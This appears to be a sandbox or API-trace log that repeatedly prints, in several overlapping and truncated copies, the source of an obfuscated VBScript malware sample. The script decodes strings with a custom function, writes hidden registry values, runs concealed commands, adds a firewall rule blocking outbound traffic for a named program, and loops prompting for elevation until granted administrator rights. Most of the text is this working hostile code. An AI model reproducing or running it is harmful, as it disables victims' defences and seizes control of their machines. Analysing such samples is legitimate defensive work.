WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.306] wcsncmp (_String1="(asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.306] wcsncmp (_String1="asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.306] wcsncmp (_String1="sc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.306] wcsncmp (_String1="c(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 